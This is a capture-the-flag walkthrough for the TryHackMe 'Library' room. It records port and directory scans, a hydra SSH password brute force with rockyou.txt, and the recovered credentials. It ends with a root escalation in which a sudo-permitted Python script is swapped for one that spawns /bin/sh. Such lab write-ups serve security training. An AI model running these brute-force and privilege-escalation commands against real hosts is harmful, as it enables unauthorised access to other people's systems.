Library
Room Link: https://tryhackme.com/room/bsidesgtlibrary
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
No other ports found
Kali
nmap -sV -sT -O -p 1-65535 $VICTIMTCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Nothing in the robots.txt except a hint to use rockyou
We can see a potential username
TCP/22 - SSH
Since I couldn't find anything on the webpage I tried bruteforcing ssh with the name we had and rockyou.txt for passwords
Kali
hydra -l meliodas -P /usr/share/wordlists/rockyou.txt $VICTIM -t4 ssh
Kali
ssh meliodas@$VICTIM
Password: iloveyou1
Victim
sudo -l
We can run a python script with NOPASSWD. After looking at the script nothing stood out that could be exploited as is but I did have access to delete the script and put my own.
Victim
cd /home/meliodas/
ls -lah
rm -f bak.py
Victim
echo "import os" > bak.py
echo 'os.system("/bin/sh")' >> bak.py
sudo /usr/bin/python3 /home/meliodas/bak.py
Last updated